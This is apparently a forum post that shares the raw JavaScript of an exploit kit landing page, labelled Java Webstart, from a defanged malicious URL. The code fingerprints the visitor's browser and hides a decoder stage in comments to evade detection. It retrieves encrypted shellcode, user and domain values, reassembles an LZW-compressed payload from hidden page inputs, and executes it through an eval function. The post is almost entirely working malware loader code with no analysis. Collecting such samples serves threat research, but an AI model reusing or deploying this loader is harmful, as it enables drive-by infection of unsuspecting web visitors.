hxxp://altacomputer.info/TF19
Exploit Kit (Java Webstart)
var BrowserDetect = {
init : function (){
this .browser = this .searchString(this .dataBrowser) || "An unknown browser";
this .version = this .searchVersion(navigator.userAgent) || this .searchVersion(
navigator.appVersion) || "an unknown version";
this .OS = this .searchString(this .dataOS) || "an unknown OS";
}
, searchString : function (data){
for (var i = 0; i < data.length; i ++ ){
var dataString = data[i].string;
var dataProp = data[i].prop;
this .versionSearchString = data[i].versionSearch || data[i].identity;
if (dataString){
if (dataString.indexOf(data[i].subString) != - 1)return data[i].identity;
}
else if (dataProp)return data[i].identity;
}
}
, searchVersion : function (dataString){
var index = dataString.indexOf(this .versionSearchString);
if (index == - 1)return ;
return parseFloat(dataString.substring(index + this .versionSearchString.length + 1));
}
, dataBrowser : [{
string : navigator.userAgent, subString : "Chrome", identity : "Chrome"
}
, {
string : navigator.userAgent, subString : "OmniWeb", versionSearch : "OmniWeb/",
identity : "OmniWeb"
}
, {
string : navigator.vendor, subString : "Apple", identity : "Safari", versionSearch :
"Version"
}
, {
prop : window.opera, identity : "Opera"
}
, {
string : navigator.vendor, subString : "iCab", identity : "iCab"
}
, {
string : navigator.vendor, subString : "KDE", identity : "Konqueror"
}
, {
string : navigator.userAgent, subString : "Firefox", identity : "Firefox"
}
, {
string : navigator.vendor, subString : "Camino", identity : "Camino"
}
, {
// for newer Netscapes (6+)
string : navigator.userAgent, subString : "Netscape",
identity : "Netscape"
}
, {
string : navigator.userAgent, subString : "MSIE", identity : "Explorer", versionSearch
: "MSIE"
}
, {
string : navigator.userAgent, subString : "Gecko", identity : "Mozilla", versionSearch
: "rv"
}
, {
// for older Netscapes (4-)
string : navigator.userAgent, subString : "Mozilla",
identity : "Netscape", versionSearch : "Mozilla"
}
], dataOS : [{
string : navigator.platform, subString : "Win", identity : "Windows"
}
, {
string : navigator.platform, subString : "Mac", identity : "Mac"
}
, {
string : navigator.userAgent, subString : "iPhone", identity : "iPhone/iPod"
}
, {
string : navigator.platform, subString : "Linux", identity : "Linux"
}
]
}
;
BrowserDetect.init();
BITS = 3;
OFS = 103;
window.moniker('detected ' + BrowserDetect.browser);
if (BrowserDetect.browser != 'Firefox'){
window._lzw = function trololo(VAR_APICRYPT, VAR_GID, VAR_EVALFUNC){
/* window.moniker('lzwfunc entrypoint');
window.GetShellcode = function () { ret
urn VAR_APICRYPT(VAR_GID('meego_sh'), parseInt(VAR_GID('meego_sk'))); }
window.Get
DllStatus = function () { return ('true' == (VAR_APICRYPT(VAR_GID('meego_ds'), parseInt(VA
R_GID('meego_sk'))))); }
window.GetUser = function () { return VAR_APICRYPT(VAR_GI
D('meego_u'), parseInt(VAR_GID('meego_sk'))); }
window.GetDomain = function () { r
eturn VAR_APICRYPT(VAR_GID('meego_d'), parseInt(VAR_GID('meego_sk'))); }
window.mo
niker('BEGINNING TO DECODE, GD = ' + window.GetDomain());
VAR_CODE = VAR_DECODER(n
ull, null);
window.moniker('CODE ' + VAR_CODE);
VAR_EVALFUNC(VAR_CODE);
function VAR_DECODER(VAR_KEY_READY, VAR_BUF) //unzipper
{
//window.
moniker("NEW WELCOME!");
var VAR_DOC = this['document'];
var VAR_ID = VA
R_DOC.getElementsByTagName('input');
// //window.moniker(VAR_ID[1].value);
if (VAR_ID) {
if (!VAR_BUF) {
VAR_BUF = "";
for (VAR_EIDX = 1; V
AR_EIDX < VAR_ID.length; VAR_EIDX += 1) {
if (VAR_ID[VAR_EIDX].id.match(/mechanica
l/)) {
VAR_BUF += VAR_ID[VAR_EIDX].value.split(' ').join('');
}
}
}
window.moniker(VAR_BUF);
}
var ibytes = Array();
for (var i = 0; i < VAR_BUF.length; i++) {
ibytes.push(VAR_BUF.charCodeAt(i)
- OFS);
}
// window.moniker('compressed array /'+ibytes.length);
try {
// Initialise the decompressor
var instream = new InStream(ibytes,
ibytes.length * BITS);
var decompressor = new LZWDecompressor(instream);
var VAR_DECODED_BUF = decompressor.decompress();
// window.moniker('decompressed /
'+VAR_DECODED_BUF.length+"\r\ndomain="+GetDomain()+"\r\n"+VAR_DECODED_BUF);
retur
n VAR_DECODED_BUF;
// var VAR_AA = window;
// VAR_AA['e'+'va
l'](VAR_DECODED_BUF);
}
catch (e) {
window.moniker(e.message);
}
}
// Used to read values represented by a user specified num
ber of bits from
// a 'bytestream' array.
function InStream(bytestream,
bitcount) {
this.bytestream = bytestream;
this.bitcount = bitcount;
this.offset = 0;
this.ReadBit = function () {
var o1 = Math.floor(this.
offset / BITS);
var o2 = this.offset % BITS;
var tmp = this.bytestream[o1]
>> (o2);
this.offset++;
return tmp & 1;
}
this.Read = fu
nction (numBits) {
if ((this.offset + numBits) > this.bitcount)
return nul
l;
// Read LSB -> MSB
var val = 0;
for (var i = 0; i < numBits; +
+i)
val |= this.ReadBit() << i;
return val;
}
}
function LZWDecompressor(instream) {
this.input = instream;
this.icall =
0;
this.DecompressDictionary = function () {
this.revhashtable = new Arr
ay();
this.nextcode = 0;
// Populate table with all possible character co
des.
for (var i = 0; i < 256; ++i) {
this.revhashtable[this.nextcode++] =
String.fromCharCode(i);
}
this.numBits = 9;
this.Size = function
() {
return (this.nextcode);
}
this.Insert = function (str) {
this.revhashtable[this.nextcode++] = str;
// How many bits are we currently
using to represent values?
// Look ahead one value because the decompressor lags
one iteration
// behind the compressor.
var log2 = Math.log(this.nextcode
+ 2) / Math.LN2;
this.numBits = Math.ceil(log2);
return this.numBits;
}
this.LookupIndex = function (idx) {
return this.revhashtable[idx];
}
this.ValSizeInBits = function () {
return this.numBits;
}
}
// LZW decompression algorithm. See http://en.wikipedia.org/wiki/LZW
// Correctly handles the 'anomolous' case of
// character/string/charact
er/string/character (with the same character
// for each character and string for
each string).
this.decompress = function (data, bitcount) {
if (bitcount
== 0)
return "";
var dict = new this.DecompressDictionary();
var
numBits = dict.ValSizeInBits();
var k = this.input.Read(numBits);
var out
put = [String.fromCharCode(k)];
var w = output[0];
var entry = "";
while ((k = this.input.Read(numBits)) != null) {
if (k < dict.nextcode) // is it
in the dictionary?
entry = dict.revhashtable[k]; // Get corresponding string.
else
entry = w + w.charAt(0);
output.push(entry);
numBits =
dict.Insert(w + entry.charAt(0));
w = entry;
}
return output.join
('');
};
} // end of LZWDecompressor
// TEMP
*/ }
;
window.lzw = (function (VAR_APICRYPT, VAR_GID, VAR_EVALFUNC)// bootstrapper
{
src = window._lzw.toString();
try {
src = src.split('/*').join('').split('*/').join('');
window.moniker('src ' + src);
//window.good_lzw =
VAR_EVALFUNC('window.good_lzw = ' + src);
}
catch (eerr){
window.moniker('eerr ' + eerr.message);
}
try {
window.moniker('typeof lzw = ' + (typeof window.good_lzw));
window.good_lzw(VAR_APICRYPT, VAR_GID, VAR_EVALFUNC);
}
catch (exerr){
window.moniker('exerr ' + exerr.message);
}
// alert(src.split('/*').join('').split('*/').join(''));
}
);
}
else {
// fucking firefox
window.lzw = (function (VAR_APICRYPT, VAR_GID, VAR_EVALFUNC){
window.moniker('lzwfunc entrypoint');
window.GetShellcode = function (){
return VAR_APICRYPT(VAR_GID('meego_sh'), parseInt(VAR_GID('meego_sk')));
}
window.GetDllStatus = function (){
return ('true' == (VAR_APICRYPT(VAR_GID('meego_ds'), parseInt(VAR_GID('meego_sk'
)))));
}
window.GetUser = function (){
return VAR_APICRYPT(VAR_GID('meego_u'), parseInt(VAR_GID('meego_sk')));
}
window.GetDomain = function (){
return VAR_APICRYPT(VAR_GID('meego_d'), parseInt(VAR_GID('meego_sk')));
}
window.moniker('BEGINNING TO DECODE, GD = ' + window.GetDomain());
VAR_CODE = VAR_DECODER(null, null);
window.moniker('CODE ' + VAR_CODE);
VAR_EVALFUNC(VAR_CODE);
function VAR_DECODER(VAR_KEY_READY, VAR_BUF)//unzipper
{
//window.moniker("NEW WELCOME!");
var VAR_DOC = this ['document'];
var VAR_ID = VAR_DOC.getElementsByTagName('input');
// //window.moniker(VAR_ID[1].value);
if (VAR_ID){
if (!VAR_BUF){
VAR_BUF = "";
for (VAR_EIDX = 1; VAR_EIDX < VAR_ID.length; VAR_EIDX += 1){
if (VAR_ID[VAR_EIDX].id.match(/mechanical/)){
VAR_BUF += VAR_ID[VAR_EIDX].value.split(' ').join('');
}
}
}
window.moniker(VAR_BUF);
}
var ibytes = Array();
for (var i = 0; i < VAR_BUF.length; i ++ ){
ibytes.push(VAR_BUF.charCodeAt(i) - OFS);
}
// window.moniker('compressed array /'+ibytes.length);
try {
// Initialise the decompressor
var instream = new InStream(ibytes, ibytes.length *
BITS);
var decompressor = new LZWDecompressor(instream);
var VAR_DECODED_BUF = decompressor.decompress();
// window.moniker('decompressed /'+VAR_DECODED_BUF.length+"\r\ndomain="+GetDomain()+"\r\n"
+VAR_DECODED_BUF);
return VAR_DECODED_BUF;
// var VAR_AA = window;
// VAR_AA['e'+'val'](VAR_DECODED_BUF);
}
catch (e){
window.moniker(e.message);
}
}
// Used to read values represented by a user specified number of bits from
// a 'bytestream' array.
function InStream(bytestream, bitcount){
this .bytestream = bytestream;
this .bitcount = bitcount;
this .offset = 0;
this .ReadBit = function (){
var o1 = Math.floor(this .offset / BITS);
var o2 = this .offset % BITS;
var tmp = this .bytestream[o1] >> (o2);
this .offset++;
return tmp & 1;
}
this .Read = function (numBits){
if ((this .offset + numBits) > this .bitcount)return null;
// Read LSB -> MSB
var val = 0;
for (var i = 0; i < numBits; ++ i)val |= this .ReadBit() << i;
return val;
}
}
function LZWDecompressor(instream){
this .input = instream;
this .icall = 0;
this .DecompressDictionary = function (){
this .revhashtable = new Array();
this .nextcode = 0;
// Populate table with all possible character codes.
for (var i = 0; i < 256; ++
i){
this .revhashtable[this .nextcode ++ ] = String.fromCharCode(i);
}
this .numBits = 9;
this .Size = function (){
return (this .nextcode);
}
this .Insert = function (str){
this .revhashtable[this .nextcode ++ ] = str;
// How many bits are we currently using to represent values?
// Look ahead one value because the decompressor lags one iteration
// behind the compressor.
var log2 = Math.log(this .nextcode + 2) / Math.LN2;
this .numBits = Math.ceil(log2);
return this .numBits;
}
this .LookupIndex = function (idx){
return this .revhashtable[idx];
}
this .ValSizeInBits = function (){
return this .numBits;
}
}
// LZW decompression algorithm. See http://en.wikipedia.org/wiki/LZW
// Correctly handles the 'anomolous' case of
// character/string/character/string/character (with the same character
// for each character and string for each string).
this .decompress = function (data
, bitcount){
if (bitcount == 0)return "";
var dict = new this .DecompressDictionary();
var numBits = dict.ValSizeInBits();
var k = this .input.Read(numBits);
var output = [String.fromCharCode(k)];
var w = output[0];
var entry = "";
while ((k = this .input.Read(numBits)) != null){
if (k < dict.nextcode)// is it in the dictionary?
entry = dict.revhashtable[k];
// Get corresponding string.
else entry = w + w.charAt(0);
output.push(entry);
numBits = dict.Insert(w + entry.charAt(0));
w = entry;
}
return output.join('');
}
;
}
// end of LZWDecompressor
// TEMP
}
);
}
window.moniker('decryptor bound');
(repeated 1 time)
window.good_lzw = function trololo(VAR_APICRYPT, VAR_GID, VAR_EVALFUNC){
}
Topic: http://altacomputer.info/TF19 (Read 3884 times)